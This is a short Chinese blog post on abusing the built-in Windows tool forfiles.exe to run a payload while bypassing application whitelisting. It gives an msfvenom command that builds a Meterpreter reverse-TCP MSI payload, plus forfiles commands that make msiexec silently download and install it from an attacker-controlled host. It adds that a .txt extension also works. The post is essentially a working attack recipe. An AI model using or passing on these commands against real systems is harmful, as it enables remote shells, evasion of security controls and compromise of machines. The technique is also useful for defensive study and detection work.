白名单执行payload之Forfiles - Yangsir34

公告

简介

Forfiles为Windows默认安装的文件操作搜索工具之一，可根据日期，后缀名，修改日期为条件。常与批处理配合使用

已添加环境变量，路径如下：
C:\Windows\System32\forfiles.exe
C:\Windows\SysWOW64\forfiles.exe

实际使用

设定监听如下：

此处依旧使用msi的payload即可
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.122.1 lport=2021 -f msi > 2021.msi
目标终端执行如下：
forfiles /p c:\windows\system32 /m cmd.exe /c  "msiexec.exe /q /i http://192.168.122.1/2021.msi"

此处txt也是可以上线的！
forfiles /p c:\windows\system32 /m cmd.exe /c  "msiexec.exe /q /i http://192.168.122.1/2021.txt

posted on 2021-02-16 22:41 Yangsir34 阅读(162) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

论安全萌新的自我修养

公告

简介

实际使用